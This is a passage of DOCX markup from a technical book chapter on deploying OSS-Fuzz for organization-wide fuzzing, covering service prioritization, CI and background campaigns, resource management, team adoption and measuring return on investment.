        <w:t xml:space="preserve">Organizational fuzzing requires strategic thinking about resource allocation and coverage priorities. Unlike individual fuzzing campaigns that target specific vulnerabilities, automated systems must balance comprehensive coverage against computational costs while ensuring critical services receive appropriate testing intensity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The decision framework starts with service classification based on reliability impact and fuzzing suitability. Customer-facing services that process external input receive maximum fuzzing priority. Internal tools and configuration management systems receive lower priority unless they handle sensitive data or affect service availability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Input processing characteristics determine fuzzing approach and resource allocation. Services that parse complex formats—​JSON APIs, file upload handlers, protocol processors—​benefit from intensive fuzzing with multiple techniques. Services with simple input patterns require basic coverage to catch regression patterns and memory safety issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Historical vulnerability patterns inform automated testing strategy. Services with previous memory corruption issues require intensive memory safety testing with AddressSanitizer integration. Services with performance degradation history need algorithmic complexity testing with resource monitoring. Services with input validation failures require comprehensive boundary testing across all input vectors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dependency analysis reveals indirect fuzzing requirements that aren’t obvious from individual service examination. When core libraries receive updates, all dependent services require regression testing. When message formats change, both producers and consumers need compatibility validation. When authentication systems modify APIs, all integrated services need boundary testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The framework accounts for development velocity and testing capacity constraints. High-velocity services with frequent deployments require fast feedback loops that complement comprehensive background testing. Low-velocity services with infrequent releases can accommodate more intensive testing that might delay development workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resource estimation prevents over-commitment and ensures sustainable automation deployment. OSS-Fuzz campaigns require dedicated compute resources, storage for crash artifacts, and bandwidth for result synchronization. The estimation includes peak resource requirements during comprehensive testing campaigns and baseline requirements for continuous operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Organizational readiness assessment determines deployment timeline and integration complexity. Teams with existing testing infrastructure can adopt OSS-Fuzz more rapidly than teams requiring fundamental testing culture changes. Organizations with established incident response procedures can benefit immediately from automated crash discovery, while organizations lacking response capabilities need parallel development of result handling processes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="189"/>
    <w:bookmarkStart w:id="190" w:name="X242143f5d687cea84dee8acadf81d737392d7aa"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OSS-Fuzz Architecture and Private Deployment Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OSS-Fuzz provides a complete automation platform that coordinates fuzzing campaigns, manages computational resources, and correlates results across multiple techniques and targets. Understanding the architecture enables effective deployment decisions and customization for organizational requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The core architecture separates campaign coordination from execution environments, enabling flexible resource allocation and parallel campaign management. Build infrastructure compiles targets with appropriate instrumentation and fuzzing harnesses. Worker infrastructure executes campaigns with automated resource management and crash collection. Result infrastructure correlates findings, eliminates duplicates, and provides actionable reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Private deployment requires infrastructure decisions that balance automation effectiveness against operational complexity. Cloud-based deployment provides elastic resource allocation and simplified maintenance but requires careful configuration to protect proprietary code and results. On-premises deployment provides complete control and security isolation but requires dedicated infrastructure management and capacity planning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Container security configuration ensures proprietary code protection while enabling automated build and execution processes. Private container registries store build artifacts and fuzzing targets without external exposure. Network isolation prevents unauthorized access to running campaigns while enabling result collection and coordination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resource allocation strategies balance testing comprehensiveness against computational costs. Dedicated infrastructure provides predictable performance and resource availability but requires capacity planning and over-provisioning for peak workloads. Shared infrastructure reduces costs through resource pooling but requires coordination mechanisms to prevent campaign interference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The deployment strategy accounts for organizational compliance and security requirements. Financial services organizations may require additional audit logging and access controls. Healthcare organizations need HIPAA-compliant data handling and encryption. Government organizations require specific security certifications and deployment restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integration planning determines how OSS-Fuzz results enhance existing development and incident response workflows. Automated ticket creation in project management systems provides developer-friendly result delivery. Integration with monitoring and alerting systems enables immediate response to critical findings. Connection to security review processes ensures appropriate escalation and tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Storage and retention policies manage the volume of artifacts generated by continuous fuzzing campaigns. Crash reproduction cases require long-term storage for regression testing and fix verification. Coverage data enables campaign optimization but requires significant storage capacity. Build artifacts support reproducible testing but accumulate rapidly across multiple targets and configurations.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="190"/>
    <w:bookmarkStart w:id="191" w:name="X1c659d5a9fab65c51fe9efc5e40838b5abf4ef1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building OSS-Fuzz Configurations for Organizational Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Effective OSS-Fuzz deployment requires build configurations that adapt the individual fuzzing techniques you’ve mastered to organizational automation requirements. The configuration process transforms manual fuzzing expertise into automated systems that operate reliably without constant expert intervention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Project configuration defines fuzzing targets, build processes, and testing strategies for each repository or service in your organization. The configuration must balance comprehensive coverage against build complexity and maintenance overhead. Simple configurations enable rapid deployment across many repositories, while complex configurations provide targeted testing for critical services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build script development translates your manual fuzzing setup into automated processes that compile targets with appropriate instrumentation. The scripts must handle dependency management, cross-compilation requirements, and environment setup without manual intervention. Build reproducibility ensures consistent results across different execution environments and time periods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuzzing target definition requires adapting the harness patterns from previous chapters to OSS-Fuzz execution environments. Persistent mode harnesses provide better throughput for long-running campaigns. Structured input harnesses enable effective testing of complex data formats. Custom mutator integration enhances effectiveness for domain-specific input types.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The target definition process identifies fuzzing entry points that provide comprehensive code coverage while avoiding redundant testing. API endpoint testing targets request processing logic. File format testing targets parsing and validation code. Protocol testing targets communication handling and state management. Database interaction testing targets query construction and transaction handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Corpus management strategies provide effective seed inputs that guide fuzzing toward relevant code paths and vulnerability patterns. Initial corpus selection uses representative production data, sanitized for security and privacy requirements. Corpus evolution mechanisms continuously improve seed quality based on coverage feedback and crash discovery patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dictionary and mutation configuration enhances fuzzing effectiveness for organization-specific input patterns and data formats. Custom dictionaries contain domain-specific keywords, API parameters, and configuration options that guide mutation toward meaningful input variations. Mutation strategies adapt to service characteristics: aggressive mutation for robust services, conservative mutation for services with complex input validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitizer configuration enables comprehensive bug detection while managing performance overhead and result volume. AddressSanitizer provides memory safety validation with acceptable performance impact. UndefinedBehaviorSanitizer catches subtle programming errors that might cause reliability issues. Custom sanitizers can detect organization-specific error patterns and coding standard violations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Coverage configuration balances comprehensive code exploration against campaign duration and resource consumption. Source-based coverage provides detailed information about code path exploration but requires source code access and recompilation. Binary-based coverage enables testing of third-party components but provides less detailed feedback for campaign optimization.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="191"/>
    <w:bookmarkStart w:id="192" w:name="Xd5eceb5b6710ce54d1eb8942694f92cb3a796af"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hybrid Automation: CI Integration with OSS-Fuzz Background Campaigns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Organizational fuzzing requires hybrid approaches that combine immediate feedback through CI integration with comprehensive coverage through dedicated OSS-Fuzz infrastructure. The hybrid model provides developers with rapid feedback while ensuring thorough testing that discovers subtle reliability issues requiring extended execution time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CI integration provides immediate reliability feedback during development workflows without blocking deployment velocity. Fast fuzzing campaigns run during pull request validation, focusing on changed code paths and related functionality. These campaigns prioritize speed over comprehensiveness, providing basic crash detection and regression testing within CI time constraints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The immediate feedback loop enables rapid iteration on reliability fixes and prevents obvious issues from reaching review processes. Memory corruption in modified code paths triggers immediate alerts. Input validation failures in API changes block merge until addressed. Performance regressions in critical algorithms require investigation before deployment approval.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OSS-Fuzz background campaigns provide comprehensive reliability testing that operates independently of development velocity constraints. Long-running campaigns explore edge cases and complex input combinations that rapid CI testing cannot cover. These campaigns discover subtle reliability issues that require extensive input exploration or specific timing conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Background testing operates continuously across all organizational repositories, providing systematic coverage that adapts to code changes and development patterns. High-priority services receive intensive daily testing. Medium-priority services receive regular weekly campaigns. Low-priority services receive periodic coverage to catch regression patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result correlation prevents notification fatigue by intelligently routing findings based on discovery context and developer workflow integration. Critical crashes discovered during CI testing trigger immediate alerts and deployment blocking. Similar crashes discovered during background testing generate tracking issues without interrupting development flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The correlation system understands code change context and developer attention patterns. Crashes related to recent changes receive priority routing to relevant developers. Crashes in stable code that hasn’t changed recently receive lower priority and different notification channels. Crashes during scheduled maintenance windows may receive delayed notification to avoid interrupting planned work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resource coordination prevents CI and background campaigns from interfering while maximizing testing effectiveness across both execution contexts. CI campaigns receive guaranteed resource allocation to ensure predictable response times. Background campaigns utilize available resources without impacting CI performance requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shared artifacts and learning improve efficiency across both testing contexts. Interesting inputs discovered during CI testing enhance OSS-Fuzz corpus quality. Crashes discovered during background testing inform CI testing priorities. Coverage data from both contexts guides overall testing strategy optimization.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="192"/>
    <w:bookmarkStart w:id="193" w:name="X4143d56dca61af00b3be4505b8bf89e9488f9ad"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enterprise Resource Management and Campaign Coordination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Large-scale fuzzing automation requires sophisticated resource management that coordinates competing priorities while maximizing testing effectiveness across diverse organizational requirements. Enterprise deployment involves hundreds of repositories, multiple development teams, and varying service criticality levels that demand intelligent resource allocation and campaign scheduling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Priority-based resource allocation ensures critical services receive appropriate testing intensity while maintaining coverage across the entire organizational codebase. Customer-facing payment processing services receive maximum resource allocation regardless of organizational size. Internal development tools receive baseline coverage sufficient for regression detection but not comprehensive vulnerability discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dynamic resource scaling adapts to organizational patterns and seasonal requirements. Release cycles trigger intensive testing for affected services. Security reviews require comprehensive coverage across related components. Incident response may require emergency fuzzing campaigns to validate fixes and identify related vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Campaign scheduling coordinates parallel testing across multiple repositories and teams without resource contention or result conflicts. Time-based scheduling allocates peak resources to highest-priority services during optimal processing windows. Load-based scheduling adapts to current resource utilization and competing campaign requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-team coordination prevents duplicate effort while ensuring comprehensive coverage across organizational boundaries. Shared library updates trigger coordinated testing across all dependent services. API modifications require synchronized testing for both providers and consumers. Security updates demand systematic coverage across affected components.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resource budgeting provides cost control and capacity planning for sustained organizational fuzzing operations. Compute cost tracking enables budget allocation across different teams and projects. Storage cost management balances result retention against operational expenses. Network cost optimization reduces data transfer overhead without compromising testing effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performance monitoring ensures resource utilization optimization and identifies scaling requirements before capacity constraints affect testing effectiveness. CPU utilization tracking identifies over-provisioned or under-provisioned campaign allocations. Memory usage patterns guide optimization opportunities and resource reallocation. Storage growth patterns inform retention policy adjustments and capacity planning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quality metrics ensure resource allocation produces proportional reliability improvement rather than just increased testing activity. Crash discovery rates guide resource reallocation toward more effective testing strategies. Coverage improvement tracking identifies diminishing returns that suggest resource reallocation opportunities. Fix correlation analysis measures actual reliability improvement resulting from resource investment.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="193"/>
    <w:bookmarkStart w:id="194" w:name="X48fdc03b20eb3ea04826641eaef9269bbc2eb8a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-Service Coordination and Distributed System Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern enterprise applications require fuzzing coordination across service boundaries and integration points that span multiple teams, repositories, and deployment environments. Distributed system reliability testing reveals failure modes that individual service testing cannot discover: cascade failures, resource contention, state synchronization issues, and communication protocol vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Service dependency mapping enables automated systems to understand which components require coordinated testing when changes occur anywhere in the dependency graph. Authentication service modifications trigger automatic testing for all services that depend on authentication APIs. Database schema changes require testing for all applications that access affected tables. Message queue updates demand testing for both publishers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Distributed testing scenarios validate reliability characteristics that emerge only from service interactions under stress conditions. End-to-end request processing under fuzzing load reveals cascade failure patterns. Message passing with malformed payloads tests service boundary validation and error propagation. Resource contention simulation exposes synchronization issues and deadlock conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integration point testing focuses on communication boundaries where services exchange data and coordinate operations. API contract validation ensures backward compatibility during service evolution. Message serialization testing validates data integrity across service boundaries. Network communication testing identifies timeout, retry, and failure handling issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">State consistency validation ensures distributed system reliability under concurrent operations and partial failure conditions. Transaction coordination testing validates database consistency across service boundaries. Cache coherence testing identifies data consistency issues in distributed caching systems. Event ordering testing validates asynchronous processing reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Environment coordination manages the complexity of testing distributed systems that require multiple services, databases, and infrastructure components. Container orchestration provides isolated testing environments that simulate production topology. Network simulation introduces realistic latency, packet loss, and bandwidth constraints. Data synchronization ensures consistent test environments across distributed testing infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result correlation across distributed testing scenarios requires sophisticated analysis that identifies root causes spanning multiple services and infrastructure components. When payment processing failures correlate with database connection issues and authentication service slowdowns, correlation systems identify underlying resource contention patterns rather than treating symptoms as isolated issues.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="194"/>
    <w:bookmarkStart w:id="195" w:name="Xba9a387160ab55cf3500890a6aa0d9cf4539fde"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Organizational Adoption Patterns and Team Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successful enterprise fuzzing requires adoption strategies that accommodate diverse team structures, development practices, and organizational cultures while maintaining testing effectiveness and developer productivity. Different teams require different integration approaches that respect existing workflows while providing reliability value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Team readiness assessment identifies organizational factors that affect fuzzing adoption success and inform deployment strategy decisions. Teams with strong testing cultures can adopt fuzzing more rapidly than teams requiring fundamental practice changes. Teams with established incident response procedures benefit immediately from automated crash discovery, while teams lacking response capabilities need parallel development of result handling processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gradual rollout strategies minimize organizational disruption while demonstrating fuzzing value through early success patterns. Initial deployment targets high-value, high-visibility services where reliability improvements provide clear business value. Success patterns from early adopters inform expansion strategies for teams with different characteristics and requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cultural integration ensures fuzzing adoption enhances rather than disrupts existing development practices and team dynamics. Teams using behavior-driven development receive fuzzing integration that generates reliability scenarios in familiar BDD formats. Teams using test-driven development receive fuzzing integration that creates reliability tests following established TDD patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Knowledge transfer mechanisms enable teams to benefit from fuzzing automation without requiring deep expertise in fuzzing techniques or OSS-Fuzz operation. Clear documentation explains common scenarios and standard responses. Escalation procedures connect teams with fuzzing experts for complex issues requiring specialist knowledge. Training programs gradually build internal capabilities while providing immediate value through automation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Responsibility allocation clarifies ownership and accountability for different aspects of organizational fuzzing without creating bottlenecks or unclear handoffs. Platform teams maintain OSS-Fuzz infrastructure and provide integration support. Development teams own service-specific configuration and result response. Security teams provide guidance on prioritization and coordinate response to critical findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Success measurement tracks adoption effectiveness across diverse team contexts while identifying improvement opportunities and expansion strategies. Teams with high automation adoption and low production incidents demonstrate successful integration patterns. Teams with automation resistance or continuing reliability issues indicate integration approaches requiring adjustment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Communication strategies ensure fuzzing results reach appropriate stakeholders through channels and formats that enable effective action. Critical crashes generate immediate alerts through existing on-call systems. Regular reliability reports provide management visibility into program effectiveness. Developer-focused notifications integrate with existing workflow tools and communication patterns.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="195"/>
    <w:bookmarkStart w:id="196" w:name="X0b9aafa698e0d24e563103e0817b093708b42d8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Measuring Impact and Demonstrating Organizational Value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enterprise fuzzing programs require measurement frameworks that demonstrate business value and guide continuous improvement decisions. Unlike individual fuzzing campaigns that focus on immediate crash discovery, organizational programs must prove systematic reliability improvement and return on investment that justifies continued infrastructure and personnel investment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reliability improvement measurement tracks how automated fuzzing translates into measurable service stability and customer experience enhancement. Incident frequency analysis compares pre-automation and post-automation outage rates while accounting for service growth and complexity changes. Mean time to recovery measurement evaluates how automated crash analysis accelerates incident response and resolution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Business impact quantification connects reliability improvement to concrete business outcomes that support continued investment in fuzzing infrastructure and capabilities. Customer churn reduction from improved service reliability provides direct revenue impact measurement. Service level agreement compliance improvement demonstrates operational excellence gains. Development velocity measurement shows how proactive bug discovery reduces firefighting and unplanned work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cost-benefit analysis ensures fuzzing program investment produces positive returns while identifying optimization opportunities and resource allocation improvements. Direct costs include infrastructure, tooling, and personnel dedicated to fuzzing operations. Indirect costs include developer time for result investigation, false positive handling, and integration maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Return calculation compares total program costs against reliability improvement value: prevented outage costs, reduced incident response expenses, improved development productivity, and enhanced customer satisfaction. Historical analysis identifies which fuzzing techniques and coverage areas provide highest return per dollar invested.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Operational effectiveness measurement tracks program efficiency and identifies optimization opportunities that improve reliability discovery while reducing resource requirements. Coverage analysis ensures testing resources focus on code areas with highest reliability impact. Campaign effectiveness tracking identifies which fuzzing strategies discover the most actionable issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quality metrics distinguish between fuzzing activity and actual reliability improvement to ensure program resources produce meaningful results rather than just increased testing volume. Crash-to-fix correlation tracks how discovered issues translate into actual reliability improvements. Regression prevention measurement evaluates how automated testing prevents reintroduction of previously fixed issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continuous improvement processes use effectiveness data to optimize program strategies and resource allocation over time. Regular review cycles evaluate which services, techniques, and coverage patterns provide highest reliability improvement. Resource reallocation based on effectiveness data ensures optimal utilization of fuzzing infrastructure and capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stakeholder communication translates technical fuzzing metrics into business language that supports decision-making and program advocacy. Executive reporting focuses on reliability trends, business impact, and program ROI. Technical reporting provides detailed analysis for optimization and expansion decisions. Developer reporting integrates findings with existing workflow tools and communication channels.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="196"/>
    <w:bookmarkStart w:id="197" w:name="Xcfd4c5c67f74054263090f27d56ee719904303d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sustainable Operations and Long-Term Program Evolution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enterprise fuzzing programs require operational strategies that maintain effectiveness while adapting to organizational growth, technology evolution, and changing reliability requirements. Sustainable operations balance comprehensive coverage against maintenance complexity while ensuring program value persists through personnel changes and infrastructure evolution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automation maintenance strategies minimize operational overhead while ensuring continued effectiveness as organizational scale and complexity increase. Self-monitoring systems track configuration drift, performance degradation, and coverage gaps that indicate maintenance requirements. Automated updates handle routine configuration changes and infrastructure evolution without requiring constant expert intervention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scalability planning ensures fuzzing infrastructure and processes adapt to organizational growth without requiring complete redesign or disrupting existing operations. Resource scaling strategies accommodate increased repository count and testing volume. Team integration patterns scale to accommodate organizational structure changes and new development practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Knowledge preservation ensures program effectiveness persists despite team changes and organizational evolution. Documentation systems capture operational knowledge, decision rationale, and configuration patterns. Training programs transfer expertise across team members and enable program continuation during personnel transitions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
